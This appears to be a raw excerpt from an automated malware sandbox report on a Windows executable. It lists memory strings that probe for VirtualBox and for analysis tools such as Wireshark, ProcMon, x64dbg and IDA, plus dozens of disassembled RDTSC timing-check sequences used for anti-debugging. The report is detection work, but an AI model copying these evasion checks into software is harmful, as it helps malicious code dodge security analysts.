Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D369FF second address: D36A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D36BC2 second address: D36BD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D36BD2 second address: D36BD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D36BD7 second address: D36BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2BDC8ABB26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BC89 second address: D3BCA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2BDCD5A7ACh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CD46 second address: D3CD4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BF69 second address: D3BF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BF6F second address: D3BF92 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2BDC8ABB23h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CD4A second address: D3CDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F2BDCD5A7A8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jng 00007F2BDCD5A7ABh 0x0000002c or di, 2A86h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F2BDCD5A7A8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d call 00007F2BDCD5A7B6h 0x00000052 mov edi, dword ptr [ebp+12A2382Dh] 0x00000058 pop edi 0x00000059 xor edi, 2C72D0E7h 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F2BDCD5A7ACh 0x00000067 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3BF92 second address: D3BF9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CDD8 second address: D3CDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CF5D second address: D3CFDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add di, 8935h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007F2BDC8ABB20h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F2BDC8ABB18h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c or ebx, dword ptr [ebp+12A23292h] 0x00000042 mov eax, dword ptr [ebp+12A206E1h] 0x00000048 push FFFFFFFFh 0x0000004a stc 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F2BDC8ABB1Ch 0x00000055 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3CFDD second address: D3CFFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D3DF4C second address: D3DF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB1Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D46CC0 second address: D46CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D46FF4 second address: D46FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4F9CE second address: D4F9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FB60 second address: D4FB6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FB6A second address: D4FB7F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F2BDCD5A7AEh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FB7F second address: D4FBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007F2BDC8ABB28h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FBA4 second address: D4FBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jng 00007F2BDCD5A7B4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F2BDCD5A7A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D4FBBC second address: D4FBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE0F20 second address: CE0F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE0EF0 second address: CE0F12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB28h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE0F12 second address: CE0F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56601 second address: D56607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56607 second address: D5660B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5660B second address: D56619 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D567AE second address: D567CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F2BDCD5A7A8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pushad 0x0000000f jmp 00007F2BDCD5A7ADh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D567CE second address: D567D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56A9B second address: D56AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2BDCD5A7ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56AB9 second address: D56AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F2BDC8ABB16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56AC6 second address: D56ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56ACA second address: D56AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D56D71 second address: D56D76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5716E second address: D57174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D57174 second address: D57191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2BDCD5A7AAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D59E90 second address: D59E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D59E94 second address: D59E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2C8F1 second address: D2C8F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CB51 second address: D2CB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CB55 second address: D2CB63 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CF1A second address: D2CF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CF1F second address: D2CF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CFDC second address: D2CFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CFE2 second address: D2CFF5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CFF5 second address: D2CFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D107 second address: D2D10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D18E second address: D2D192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D192 second address: D2D198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D198 second address: D2D1C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2BDCD5A7A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f mov ecx, dword ptr [ebp+12A22871h] 0x00000015 nop 0x00000016 jmp 00007F2BDCD5A7ACh 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D85A second address: D2D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D85E second address: D2D8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F2BDCD5A7A6h 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+12BB5498h], ecx 0x0000001a push 0000001Eh 0x0000001c jmp 00007F2BDCD5A7ACh 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F2BDCD5A7B2h 0x00000029 jns 00007F2BDCD5A7A6h 0x0000002f popad 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DB77 second address: D2DB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DB7D second address: D2DB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DCFF second address: D2DD4B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F2BDC8ABB20h 0x00000011 nop 0x00000012 mov dword ptr [ebp+12A21BCAh], edx 0x00000018 lea eax, dword ptr [ebp+12BE4636h] 0x0000001e or cx, 4BACh 0x00000023 nop 0x00000024 jmp 00007F2BDC8ABB22h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jo 00007F2BDC8ABB18h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DD4B second address: D2DD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5D66B second address: D5D671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5D671 second address: D5D675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5D773 second address: D5D782 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5DB6D second address: D5DB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2BDCD5A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE94FC second address: CE9517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2BDC8ABB22h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D62692 second address: D626AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D626AA second address: D626B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F2BDC8ABB16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D626B6 second address: D626BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D62C4F second address: D62C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D62243 second address: D62247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6319D second address: D631A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2BDC8ABB16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D631A9 second address: D631CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2BDCD5A7B8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D631CD second address: D631F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnl 00007F2BDC8ABB16h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2BDC8ABB1Fh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2BDC8ABB1Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D631F7 second address: D631FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D63459 second address: D63467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2BDC8ABB16h 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D63467 second address: D634B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2BDCD5A7AEh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2BDCD5A7B5h 0x00000011 jmp 00007F2BDCD5A7B3h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jng 00007F2BDCD5A7A6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D634B2 second address: D634B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D686C5 second address: D686CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D686CB second address: D686D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2BDC8ABB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D686D5 second address: D68705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F2BDCD5A7B2h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68705 second address: D68709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68709 second address: D68711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6889E second address: D688A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D688A4 second address: D688F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2BDCD5A7B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2BDCD5A7ADh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F2BDCD5A7A8h 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F2BDCD5A7B4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68A8D second address: D68AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB20h 0x00000009 jmp 00007F2BDC8ABB23h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68AB4 second address: D68AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
